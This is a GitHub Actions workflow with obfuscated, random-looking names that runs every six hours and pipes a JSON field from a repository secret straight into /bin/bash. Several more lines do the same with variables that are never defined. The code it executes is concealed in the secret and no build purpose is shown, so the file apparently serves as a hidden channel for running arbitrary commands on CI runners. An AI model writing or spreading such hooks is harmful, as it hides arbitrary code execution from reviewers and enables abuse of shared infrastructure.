name: xiaoyushi7654

on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoyushi7654
        env:
          l1995: ${{ secrets.l1995 }}
        run: |
          echo $l1995 | jq -r .lchu94 | /bin/bash
          echo $bqsuh31800 | jq -r .rvq09 | /bin/bash
          echo $qgmm5122 | jq -r .hg66747 | /bin/bash
          echo $b751 | jq -r .ko369 | /bin/bash
          echo $ege82320 | jq -r .azl31 | /bin/bash
          echo $p8 | jq -r .pgfux58446 | /bin/bash
          echo $yee619 | jq -r .qna17 | /bin/bash

